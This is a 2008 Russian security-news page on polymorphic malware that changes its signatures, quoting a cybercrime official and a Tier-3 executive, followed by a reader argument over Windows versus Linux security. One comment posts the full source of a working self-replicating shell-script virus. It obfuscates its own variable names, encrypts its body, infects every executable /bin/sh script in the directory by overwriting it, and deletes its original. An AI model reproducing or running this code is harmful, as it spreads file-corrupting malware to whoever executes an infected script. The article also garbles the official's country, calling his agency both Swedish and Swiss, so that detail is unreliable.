Вирусы научились подстраиваться под антивирусное ПО

image

Теги: вирус, антивирус, киберпреступность

Марк Хенауэр, глава операции по борьбе с киберпреступностью Департамента юстиции и полиции Швеции, сказал, что вирусы и другие вредоносные программы уже имеют возможность менять свои сигнатуры каждые несколько часов.

Джефф Свини (Geoff Sweeney), CTO Tier-3, специалист ИТ-безопасности, комментирует замечания, высказанные главой шведской операции «Киберкриминал» (Swiss cybercrime operation).

В интервью СМИ в конце прошлой недели Марк Хенауэр (Marc Henauer), глава операции по борьбе с киберпреступностью Департамента юстиции и полиции Швеции, сказал, что вирусы и другие вредоносные программы уже имеют возможность менять свои сигнатуры каждые несколько часов.

Это, по его словам, означает, что атакующие нередко находятся на шаг впереди перед защитным ПО.

Хенауэр рекомендовал компаниям пересмотреть и изменить свои подходы к защите данных.

«Динамическое изменение кода позволяет вирусу автоматически приспосабливаться к антиспамовым и антивирусным движкам, с которым он сталкивается. К сожалению, методы, используемые для создания этих видоизменяющихся угроз, в настоящее время легко доступны и порождают волну видоизменяющегося вредоносного ПО, созданного на основе методов социальной инженерии. Такое ПО может использоваться для кражи личных данных через электронные письма и рассылки видоизменяющихся троянов во вложениях. Каждая инфекция увеличивает эффективность следующей волны вредоносных писем, рассылаемых автоматизированными системами», - говорит Свини.

«Дни, когда для защиты ИТ-ситсемы было достаточно одного приложения безопасности, давно прошли. Защита от этого натиска должна быть основана на мониторинге, который охватывает все точки доступа к ПК - SMTP, DNS, HTTP(s), IM и т.д., так как они могут использоваться видоизменяющимися вирусами», - заключил Свини.


или введите имя

CAPTCHA
Страницы: 1  2  
16-05-2008 10:40:36
CTO Tier-3 впервые встретилась с полиморфными вирусами...
0 |
1
16-05-2008 10:40:59
Викинги опять открыли Америку? Первые самомодифицирующиеся вирусы появились в начале 90-х.
0 |
1
19-05-2008 10:51:09
и закончились только с появлением линукс. а лохи продолжают ставить затрояненную винду и обгаживать наши почтовики спамом
0 |
1
19-05-2008 11:27:11
Тролль детектед
0 |
1
19-05-2008 13:48:58
и закончились только с появлением линукс.как я вижу, некоторые посетители секлаба, в программировании дальше хелло-ворда не пошли...
0 |
1
16-05-2008 10:56:06
Автор, поправь статью, пожалуйста. Там у тебя фактическая ошибка: Защита от этого натиска должна быть основана на мониторинге, который охватывает все точки доступа к ПК - SMTP, DNS, HTTP(s), IM и т.д.Надо писать не "точки доступа к ПК", а "точки доступа к виндовс-ПК". Это точнее определяет суть проблемы и ее решение.
0 |
1
16-05-2008 11:33:26
наслухались баек про безопасный линукс?
0 |
1
16-05-2008 13:07:48
Нет, только правды про опасный windows. Обратите внимание, коллеги, первыми про линукс заговаривают всегда вантузятники. Это у них такая навязчивая маниакальная паранойя. Надо будет увеличить им дозу успокоительных и на ночь привязывать к кровати.
0 |
1
16-05-2008 13:47:52
наслухались баек про безопасный линукс?Зачем слушать? Для винды вирусов видел кучу (час назад опять на флэшке принесли). Для линукса в диком виде вирусов не видел ни разу. Это факты, спорить с ними будет только идиот, потому что против фактов псевдологические рассуждения неавторитетных людей не котируются. Вот когда напишешь хотя бы один вирус для линукса и я его в своей сетке увижу, тогда и приходи.
0 |
1
16-05-2008 14:45:14
А какой смысл в том же боте под линухом, если тачек с виндой хоть ж жуй? Сам ведь понимаешь, что отсутствие серьёзных угроз, отнюдь не 100% показатель... Да и в целом уровень никс-юзеров повыше, чем у достаточно весомого количества дятлов за виндами. Имхо, самая безопасная система та, которая не имеет связи с внешним миром. Вообще. Даже с юзером, посредством клавы
0 |
1
16-05-2008 16:43:01
как в том анекдоте прямо - на ### тебе колеса?
0 |
1
16-05-2008 23:13:30
А какой смысл в том же боте под линухом, если тачек с виндой хоть ж жуй?Вот именно это я и называю псевдо-логическими рассуждениями неавторитетных людей. Какая разница юзеру, почему нет ботнетов, и что сказал про это "ууу"? Их нет, и этот факт убивает любой треп наповал. Софт для меня есть, все, что мне нужно, работает надежно, внимания система требует минимального. К чему тут рассуждения? Гет зе фактс! как говорят в некрософте, а болтовню оставьте девочкам.
0 |
18-05-2008 17:50:06
Да? А ты вот посмотри на себя - самоуверенный админ и есть самый опасный вирус. Без обид - нельзя почивать на лаврах. В своё время под Windows NT DOS вирусы не запускались - их запуск блокировала сама система, а потом и появились. Это я так, для размышления. У меня например стоит две машины под Solaris и десяток под BSD. И я что-то себя спокойно не чувствую. Тут ууу прав - отключи все провода провода от системника и иди пей пиво. Так тебе спокойней будет.
0 |
1
18-05-2008 23:11:13
Перестали работать в виндах ) А в виндовом дос эмуляторе жили плодились и размножались Порой доставляя массу приятных моментов )
0 |
1
19-05-2008 13:55:25
нельзя почивать на лаврахНа работе виндовых машин больше, чем линуксовых. Специфика отраслевого софта такая. Так что почивать на лаврах не удается - приходится крутится. В своё время под Windows NT... а потом...Я из этого выводы сделал, а какие выводы и практические шаги сделал после этого производитель этой системы? Учитывая, что урок не пошел в прок - выводы и шаги некрософт сделал неверные. Результат виден даже слепому - за 2007 год зловредной гадости под винду наделали чуть ли не больше, чем за всю предыдущую историю.
0 |
1
19-05-2008 10:17:51
линукс в диком виде еще большая редкость чем трезвый пенгвин. линукскапец++
0 |
1
20-05-2008 21:29:13
#!/bin/sh #freeman randchar () { sss=(q w e r t y u i o p a s d f g h j k l z x c v b n m) echo ${sss[`expr $RANDOM % 26`]} } getword () { word="" while ! [ ${#word} -eq $1 ] do c=`randchar` word=`echo $word | tr -d $c`$c done echo $word } 2>/dev/null zamperem () { perems="zamperem getword randchar perems" s=`expr $RANDOM % 4 + 3` for a in $perems do cat $1 | sed -e "s/${a}/`getword ${s}`/g" > $1 done } 2>/dev/null vic='.aaa' for e in `printf '\x2a'` do if [ "`head -1 $e`" = "#!/bin/sh" -a -x $e -a "`head -2 $e | sed -e "1d"`" != "#freeman" ] then cp $0 $vic zamperem $vic bukv1=`getword 26` bukv2=`getword 26` crypt=`cat $vic | tr $bukv1'\n' $bukv2\`printf '\xff'\`` if [ "`expr $RANDOM % 2`" = "1" ] then echo "#!/bin/sh" > $vic echo "#freeman" >> $vic echo 'head -4 $0 | sed -e "2d" -e "1d" -e "3d" | tr '${bukv2}'`printf "\xff"` '${bukv1}'"\n" >> ....; chmod +x ....' >> $vic echo $crypt >> $vic echo 'sh ./.... &' >> $vic else head -2 $0 > $vic echo 'fst="head"' >> $vic echo '${fst} -5 $0 | sed -e "3d" -e "2d" -e "1d"-e "4d" | tr '${bukv2}'`printf "\xff"` '${bukv1}'"\n" >> ...; chmod +x ...' >> $vic echo $crypt >> $vic echo 'sh ./... &' >> $vic fi cat $e | sed -e "1d" >> $vic mv $vic $e 2>>/dev/null fi done rm -f $0
0 |
1
24-06-2008 12:11:07
Совсем мозг алкоголем затуманен? Зачем писать что-то под сиситему которая так аццки непопулярна, один процент из всех ПК в мире это наглядно демонстрирует. линукс как был уделом маргиналов так им и останется, можно сколько угодно в пьяном угаре кричать "вендекапец", но с фактами не поспоришь.
0 |
1
16-05-2008 19:04:24
наслухались баек про безопасный линукс? Ну вот эти "байки" у меня в виде убунты на 3 машинах у знакомых юзеров уже 2 года как работают.Без антивиря и фиреволла, кстати.Только обновления врублены.И ничего, все чистенько.А XP поставленная в то же время у таких же юзвергов но которым захотелось ее уже запаршивела вусмерть, от обилия заразы глючит и юзеры стонут.Несмотря на фиреволл и антивирус(которые конечно же обновлять нормально юзеры не умеют).Разница однако... :\.Мне такие байки нравятся, вот.
0 |
1
17-05-2008 02:55:48
наслухались баек про безопасный линукс? Пользуемся им. Нет никаких "вирусов". О "вирусах" думать не нужно. Система занимается делом, а не "отловом вирусов".
0 |
FSA
17-05-2008 18:45:56
Нет никаких "вирусов". Накурились? "Нет никакой ложки". Есть, всё есть, вот только архитектура системы не позволяет легко в эту систему интегрироваться, чего нельзя сказать о Windows. Да и Linux ставят как правило опытные пользователи, которым и под Windows антивирус особо не нужен, разве что для лечения чужих компьютеров.
0 |
1
19-05-2008 04:43:20
Да, я понимаю, сложно виндузятникам представить безопасный секс без малейших средств защиты.
0 |
1
16-05-2008 13:02:03
Улыбнул
0 |
1
16-05-2008 11:05:39
ппц, препод еще 8 лет назад в универе объяснял технологии написания полиморфных вирусов. Проснулись....
0 |
16-05-2008 11:43:02
Полиморфные вирусы все таки как-то научились ловить, а в заметке говориться, что сигнатуры меняются теперь быстрей чем раньше, а кроме того каждое заражение облегчает последующее проникновение через защиту.
0 |
1
16-05-2008 11:49:02
Глава Swiss cybercrime operation пиарился и выбивал деньги, наводя панику CTO из Tier-3, естественно, и по этому 'поводу' решил разрекламировать свои продукты скорость изменения сигнатур здесь не причем
0 |
Страницы: 1  2